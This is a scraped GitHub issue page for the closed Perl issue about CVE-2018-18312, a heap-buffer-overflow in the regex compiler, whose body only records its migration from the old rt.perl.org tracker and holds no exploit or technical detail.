linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ data-styled.g65[id="LoadingSkeleton-sc-695d630a-0"]{content:"qthD,eyUUZI,jjSEMS,itUJci,cShPCj,duUilQ,izpEpw,jmMBqY,izxDlu,kxHHCJ,kzTRZv,cGKgXT,jhGuqg,iXfpGx,likIaf,iFsrGy,jiLAah,"}/*!sc*/ .gcWyXp{font-size:inherit;}/*!sc*/ data-styled.g66[id="sc-aXZVg"]{content:"gcWyXp,"}/*!sc*/ .jawglP{display:-webkit-inline-box;display:-webkit-inline-flex;display:-ms-inline-flexbox;display:inline-flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;font-weight:600;line-height:16px;color:var(--bgColor-default,var(--color-canvas-default,#ffffff));text-align:center;border-radius:100px;background-color:var(--bgColor-done-emphasis,var(--color-done-emphasis,#8250df));color:var(--fgColor-onEmphasis,var(--color-fg-on-emphasis,#ffffff));box-shadow:var(--boxShadow-thin,inset 0 0 0 1px) var(--borderColor-done-emphasis,transparent);padding-left:12px;padding-right:12px;padding-top:8px;padding-bottom:8px;font-size:14px;white-space:nowrap;}/*!sc*/ data-styled.g114[id="StateLabel__StateLabelBase-sc-qthdln-0"]{content:"jawglP,"}/*!sc*/ @-webkit-keyframes crVFvv{0%{-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);}50%{-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);}100%{-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);}}/*!sc*/ @keyframes 
crVFvv{0%{-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);}50%{-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);}100%{-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);}}/*!sc*/ data-styled.g119[id="sc-keyframes-crVFvv"]{content:"crVFvv,"}/*!sc*/ </style><!--$--><!--$--><div class="Box-sc-g0xbh4-0 gjuRkX"><div data-testid="issue-viewer-container" class="Box-sc-g0xbh4-0 hzqxma"><!--$--><div class="Box-sc-g0xbh4-0 fGkgDM IssueViewer-module__issueViewerContainer--flht4"><!--$--><div class="Box-sc-g0xbh4-0 ehzXEi"><div aria-label="Header" role="region" data-testid="issue-header"><div class="Box-sc-g0xbh4-0 prc-PageHeader-PageHeader-sT1Hp HeaderViewer-module__headerContainer--p0Eo1 "><div class="Box-sc-g0xbh4-0 cEqqlB prc-PageHeader-TitleArea-jxJZy" data-component="TitleArea" data-size-variant="medium"><h1 class="Box-sc-g0xbh4-0 dZmqGw prc-PageHeader-Title-LKOsd prc-Heading-Heading-6CmGO" data-component="PH_Title" data-hidden="false" style="--custom-font-size:26px,26px,var(--text-title-size-large, 32px),var(--text-title-size-large, 32px);--custom-line-height:1;--custom-font-weight:normal"><bdi class="Box-sc-g0xbh4-0 lhNOUb markdown-title" data-testid="issue-title">[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2)</bdi> <span class="Box-sc-g0xbh4-0 YJa-Di">#16649</span></h1></div><div class="Box-sc-g0xbh4-0 prc-PageHeader-ContextArea-6ykSJ" data-hidden-regular="true"><div class="Box-sc-g0xbh4-0 ialRZd prc-PageHeader-ContextAreaActions-RTJRk" data-hidden-regular="true"><div class="Box-sc-g0xbh4-0 cQpCwc"><div class="Box-sc-g0xbh4-0 lkyTpy"><a type="button" href="/login?return_to=" target="_blank" class="prc-Button-ButtonBase-c50BI" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="primary" aria-describedby=":R4ih9b:-loading-announcement"><span 
data-component="buttonContent" data-align="center" class="prc-Button-ButtonContent-HKbr-"><span data-component="text" class="prc-Button-Label-pTQ3x">New issue</span></span></a></div><button data-component="IconButton" type="button" class="prc-Button-ButtonBase-c50BI prc-Button-IconButton-szpyj" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="invisible" aria-describedby=":Reqh9b:-loading-announcement" aria-labelledby=":Rqh9b:"><svg aria-hidden="true" focusable="false" class="octicon octicon-copy" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg></button><span class="CopyToClipboardButton-module__tooltip--Dq1IB prc-TooltipV2-Tooltip-cYMVY" data-direction="s" aria-label="Copy link" aria-hidden="true" id=":Rqh9b:">Copy link</span></div></div></div><div class="Box-sc-g0xbh4-0 bKeiGd prc-PageHeader-Actions-ygtmj" data-component="PH_Actions"><div class="Box-sc-g0xbh4-0 cQpCwc"><div class="Box-sc-g0xbh4-0 lkyTpy"><a type="button" href="/login?return_to=" target="_blank" class="prc-Button-ButtonBase-c50BI" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="primary" aria-describedby=":R4kh9b:-loading-announcement"><span data-component="buttonContent" data-align="center" class="prc-Button-ButtonContent-HKbr-"><span data-component="text" class="prc-Button-Label-pTQ3x">New issue</span></span></a></div><button data-component="IconButton" type="button" 
class="prc-Button-ButtonBase-c50BI prc-Button-IconButton-szpyj" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="invisible" aria-describedby=":Resh9b:-loading-announcement" aria-labelledby=":Rsh9b:"><svg aria-hidden="true" focusable="false" class="octicon octicon-copy" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg></button><span class="CopyToClipboardButton-module__tooltip--Dq1IB prc-TooltipV2-Tooltip-cYMVY" data-direction="s" aria-label="Copy link" aria-hidden="true" id=":Rsh9b:">Copy link</span></div></div></div></div></div><div class="Box-sc-g0xbh4-0 ehzXEi"><div data-testid="issue-metadata-fixed" class="Box-sc-g0xbh4-0 eshSer"><div class="Box-sc-g0xbh4-0 cySYaL"><div class="Box-sc-g0xbh4-0 exQbKw"><div><span data-testid="header-state" class="StateLabel__StateLabelBase-sc-qthdln-0 jawglP"><svg focusable="false" aria-label="Issue" class="octicon octicon-issue-closed Octicon-sc-9kayk9-0 hTWZgt" role="img" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M11.28 6.78a.75.75 0 0 0-1.06-1.06L7.25 8.69 5.78 7.22a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06 0l3.5-3.5Z"></path><path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0Zm-1.5 0a6.5 6.5 0 1 0-13 0 6.5 6.5 0 0 0 13 0Z"></path></svg>Closed</span></div><!--$--><!--/$--></div></div></div></div><div data-testid="issue-metadata-sticky" 
class="Box-sc-g0xbh4-0 emuTBT js-notification-shelf-offset-top"><div class="Box-sc-g0xbh4-0 ehzXEi"><div class="Box-sc-g0xbh4-0 iEncmA"><div><span data-testid="header-state" class="StateLabel__StateLabelBase-sc-qthdln-0 jawglP"><svg focusable="false" aria-label="Issue" class="octicon octicon-issue-closed Octicon-sc-9kayk9-0 hTWZgt" role="img" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M11.28 6.78a.75.75 0 0 0-1.06-1.06L7.25 8.69 5.78 7.22a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06 0l3.5-3.5Z"></path><path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0Zm-1.5 0a6.5 6.5 0 1 0-13 0 6.5 6.5 0 0 0 13 0Z"></path></svg>Closed</span></div><div class="Box-sc-g0xbh4-0 fHWHoy"><div class="Box-sc-g0xbh4-0 htJDeH"><a class="Box-sc-g0xbh4-0 hVVawZ prc-Link-Link-85e08" href="#top"><bdi class="Box-sc-g0xbh4-0 markdown-title" data-testid="issue-title-sticky">[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2)</bdi></a><span class="Box-sc-g0xbh4-0 iQfnYL prc-Text-Text-0ima0">#16649</span></div><div class="Box-sc-g0xbh4-0 jGasrR"><!--$--><!--/$--></div></div></div></div></div><div class="Box-sc-g0xbh4-0 gxAvdY"></div><div class="Box-sc-g0xbh4-0 dkqtNN"><div class="Box-sc-g0xbh4-0 hfKjHv"></div></div><div class="Box-sc-g0xbh4-0 ehzXEi"><div class="Box-sc-g0xbh4-0 jonlJW"><div class="Box-sc-g0xbh4-0 bSTcOH"><div data-testid="issue-viewer-issue-container"><div class="Box-sc-g0xbh4-0 gRssIw"><div data-testid="issue-body" class="Box-sc-g0xbh4-0 bDlPR react-issue-body" data-hpc="true"><h2 class="sr-only">Description</h2><div class="Box-sc-g0xbh4-0 crMLA-D"><div class="Box-sc-g0xbh4-0 bjwYme"><div class="Box-sc-g0xbh4-0 jSpDiO"><div class="Box-sc-g0xbh4-0 fnEhwD ActivityHeader-module__activityHeader--Flalv"><div class="Box-sc-g0xbh4-0 koxHLL ActivityHeader-module__narrowViewportWrapper--Hjl75"><div class="Box-sc-g0xbh4-0 dqmClk"><a class="Box-sc-g0xbh4-0 cRhwji prc-Link-Link-85e08" href="https://github.com/p5pRT" data-hovercard-url="/users/p5pRT/hovercard" data-testid="issue-body-header-author">p5pRT</a></div><div class="Box-sc-g0xbh4-0 bJQcYY ActivityHeader-module__footer--FVHp7"><span>opened </span><a class="Box-sc-g0xbh4-0 bjFvWy prc-Link-Link-85e08" href="https://github.com/Perl/perl5/issues/16649#issue-509394960" data-testid="issue-body-header-link"><relative-time sx="[object Object]" class="sc-aXZVg gcWyXp">on <!-- -->Aug 4, 2018</relative-time></a></div></div><div class="Box-sc-g0xbh4-0 kgTqOk ActivityHeader-module__narrowViewportWrapper--Hjl75"><div class="Box-sc-g0xbh4-0 izrTon ActivityHeader-module__edits--LwHTE"></div><div class="Box-sc-g0xbh4-0 kpoUe"><div class="Box-sc-g0xbh4-0 ezcJRX"></div><div class="Box-sc-g0xbh4-0 dnyPuu"></div></div></div></div></div><div 
class="IssueBodyViewer-module__IssueBody--MXyFt"><div data-testid="markdown-body" data-team-hovercards-enabled="true" class="markdown-body" data-turbolinks="false"><div class="Box-sc-g0xbh4-0 markdown-body NewMarkdownViewer-module__safe-html-box--cRsz0"><p dir="auto">Migrated from <a href="https://rt-archive.perl.org/perl5/Ticket/Display.html?id=133423" rel="nofollow">rt.perl.org#133423</a> (status was 'resolved')</p> <p dir="auto">Searchable as RT133423$</p></div></div><div class="IssueBodyViewer-module__IssueBodyTaskList--r4XEH"><!--$--><div role="toolbar" aria-label="Reactions" class="d-flex gap-1 flex-wrap"></div><!--/$--></div></div></div></div></div></div></div><div data-testid="issue-viewer-comments-container" class="react-comments-container"><div class="Box-sc-g0xbh4-0 fDhSWy"><!--$!--><template></template><!--/$--></div></div></div><div data-testid="issue-viewer-metadata-container" class="Box-sc-g0xbh4-0 kpqASb"><div class="IssueViewer-module__issueViewerMetadataPane--Q1n1b" data-testid="issue-viewer-metadata-pane"><h2 class="IssueViewer-module__metadataHeader--ZtOKL 
prc-Heading-Heading-6CmGO">Metadata</h2><h2 class="IssueViewer-module__largeScreenMetadataHeader--YW31U sr-only prc-Heading-Heading-6CmGO">Metadata</h2><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Assignees</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No one assigned</span><div class="Box-sc-g0xbh4-0 flpEwB"><ul class="List__ListBox-sc-1x7olzq-0 eoXvfR prc-ActionList-ActionList-X4RiC" data-dividers="false" data-variant="full"></ul></div></div></div><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Labels</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No labels</span><div class="Box-sc-g0xbh4-0 flpEwB"><div tabindex="-1" data-testid="issue-labels" class="Box-sc-g0xbh4-0 foDGRB">No labels</div></div></div></div><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Type</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No type</span><div class="Box-sc-g0xbh4-0 flpEwB"><div class="Box-sc-g0xbh4-0 gMMrYE"><div class="Box-sc-g0xbh4-0 flpEwB"></div></div></div></div></div><!--$--><div data-testid="sidebar-projects-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Projects</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No projects</span><div class="Box-sc-g0xbh4-0 flpEwB"><div class="Box-sc-g0xbh4-0 fBPJxs"></div></div></div></div><!--/$--><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 
hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Milestone</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No milestone</span><div class="Box-sc-g0xbh4-0 flpEwB"><ul class="prc-ActionList-ActionList-X4RiC" data-dividers="false" data-variant="full"><div class="Box-sc-g0xbh4-0 flpEwB"></div></ul></div></div></div><!--$--><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Relationships</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">None yet</span><div class="Box-sc-g0xbh4-0 flpEwB"></div></div></div><div data-testid="sidebar-section" class="Box-sc-g0xbh4-0 kDreLw"><div class="Box-sc-g0xbh4-0 hfKjHv"><div class="Box-sc-g0xbh4-0 bwxuvd"><h3 class="Box-sc-g0xbh4-0 jVkRst prc-Heading-Heading-6CmGO">Development</h3></div><span class="Box-sc-g0xbh4-0 dCKzSy prc-Text-Text-0ima0">No branches or pull requests</span><div class="Box-sc-g0xbh4-0 flpEwB"></div></div></div><!--/$--><h2 class="sr-only prc-Heading-Heading-6CmGO">Issue actions</h2><ul class="prc-ActionList-ActionList-X4RiC OptionsSection-module__ActionListOverrides--M6klF" data-dividers="false" data-variant="full"></ul></div></div></div></div><!--/$--></div><!--/$--></div></div><!--/$--><!--/$--><script type="application/json" id="__PRIMER_DATA_:R0:__">{"resolvedServerColorMode":"day"}</script></div> </react-app> </turbo-frame> </div> </turbo-frame> </main> </div> </div> <footer class="footer pt-8 pb-6 f6 color-fg-muted p-responsive" role="contentinfo" > <h2 class='sr-only'>Footer</h2> <div class="d-flex flex-justify-center flex-items-center flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap"> <div class="d-flex flex-items-center flex-shrink-0 mx-2"> <a aria-label="Homepage" title="GitHub" class="footer-octicon mr-2" href="https://github.com"> <svg aria-hidden="true" 
height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M12 1C5.9225 1 1 5.9225 1 12C1 16.8675 4.14875 20.9787 8.52125 22.4362C9.07125 22.5325 9.2775 22.2025 9.2775 21.9137C9.2775 21.6525 9.26375 20.7862 9.26375 19.865C6.5 20.3737 5.785 19.1912 5.565 18.5725C5.44125 18.2562 4.905 17.28 4.4375 17.0187C4.0525 16.8125 3.5025 16.3037 4.42375 16.29C5.29 16.2762 5.90875 17.0875 6.115 17.4175C7.105 19.0812 8.68625 18.6137 9.31875 18.325C9.415 17.61 9.70375 17.1287 10.02 16.8537C7.5725 16.5787 5.015 15.63 5.015 11.4225C5.015 10.2262 5.44125 9.23625 6.1425 8.46625C6.0325 8.19125 5.6475 7.06375 6.2525 5.55125C6.2525 5.55125 7.17375 5.2625 9.2775 6.67875C10.1575 6.43125 11.0925 6.3075 12.0275 6.3075C12.9625 6.3075 13.8975 6.43125 14.7775 6.67875C16.8813 5.24875 17.8025 5.55125 17.8025 5.55125C18.4075 7.06375 18.0225 8.19125 17.9125 8.46625C18.6138 9.23625 19.04 10.2125 19.04 11.4225C19.04 15.6437 16.4688 16.5787 14.0213 16.8537C14.42 17.1975 14.7638 17.8575 14.7638 18.8887C14.7638 20.36 14.75 21.5425 14.75 21.9137C14.75 22.2025 14.9563 22.5462 15.5063 22.4362C19.8513 20.9787 23 16.8537 23 12C23 5.9225 18.0775 1 12 1Z"></path> </svg> </a> <span> &copy; 2025 GitHub,&nbsp;Inc. 
</span> </div> <nav aria-label="Footer"> <h3 class="sr-only" id="sr-footer-heading">Footer navigation</h3> <ul class="list-style-none d-flex flex-justify-center flex-wrap mb-2 mb-lg-0" aria-labelledby="sr-footer-heading"> <li class="mx-2"> <a data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Terms&quot;,&quot;label&quot;:&quot;text:terms&quot;}" href="https://docs.github.com/site-policy/github-terms/github-terms-of-service" data-view-component="true" class="Link--secondary Link">Terms</a> </li> <li class="mx-2"> <a data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to privacy&quot;,&quot;label&quot;:&quot;text:privacy&quot;}" href="https://docs.github.com/site-policy/privacy-policies/github-privacy-statement" data-view-component="true" class="Link--secondary Link">Privacy</a> </li> <li class="mx-2"> <a data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to security&quot;,&quot;label&quot;:&quot;text:security&quot;}" href="https://github.com/security" data-view-component="true" class="Link--secondary Link">Security</a> </li> <li class="mx-2"> <a data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to status&quot;,&quot;label&quot;:&quot;text:status&quot;}" href="https://www.githubstatus.com/" data-view-component="true" class="Link--secondary Link">Status</a> </li> <li class="mx-2"> <a data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to docs&quot;,&quot;label&quot;:&quot;text:docs&quot;}" href="https://docs.github.com/" data-view-component="true" class="Link--secondary Link">Docs</a> </li> <li class="mx-2"> <a data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to contact&quot;,&quot;label&quot;:&quot;text:contact&quot;}" href="https://support.github.com?tags=dotcom-footer" data-view-component="true" class="Link--secondary 
Link">Contact</a> </li> <li class="mx-2" > <cookie-consent-link> <button type="button" class="Link--secondary underline-on-hover border-0 p-0 color-bg-transparent" data-action="click:cookie-consent-link#showConsentManagement" data-analytics-event="{&quot;location&quot;:&quot;footer&quot;,&quot;action&quot;:&quot;cookies&quot;,&quot;context&quot;:&quot;subfooter&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;cookies_link_subfooter_footer&quot;}" > Manage cookies </button> </cookie-consent-link> </li> <li class="mx-2"> <cookie-consent-link> <button type="button" class="Link--secondary underline-on-hover border-0 p-0 color-bg-transparent" data-action="click:cookie-consent-link#showConsentManagement" data-analytics-event="{&quot;location&quot;:&quot;footer&quot;,&quot;action&quot;:&quot;dont_share_info&quot;,&quot;context&quot;:&quot;subfooter&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;dont_share_info_link_subfooter_footer&quot;}" > Do not share my personal information </button> </cookie-consent-link> </li> </ul> </nav> </div> </footer> <ghcc-consent id="ghcc" class="position-fixed bottom-0 left-0" style="z-index: 999999" data-initial-cookie-consent-allowed="" data-cookie-consent-required="false"></ghcc-consent> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" 
data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> You can’t perform that action at this time. </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details> </template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div> </div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0" data-copy-feedback="Copied!" 
data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path> </svg> </clipboard-copy> </div> </template> <template id="snippet-clipboard-copy-button-unpositioned"> <div class="zeroclipboard-container"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn btn-invisible js-clipboard-copy m-2 p-0 d-flex flex-justify-center flex-items-center" data-copy-feedback="Copied!" 
data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path> </svg> </clipboard-copy> </div> </template> </div> <div id="js-global-screen-reader-notice" class="sr-only mt-n1" aria-live="polite" aria-atomic="true" ></div> <div id="js-global-screen-reader-notice-assertive" class="sr-only mt-n1" aria-live="assertive" aria-atomic="true"></div> </body> </html>
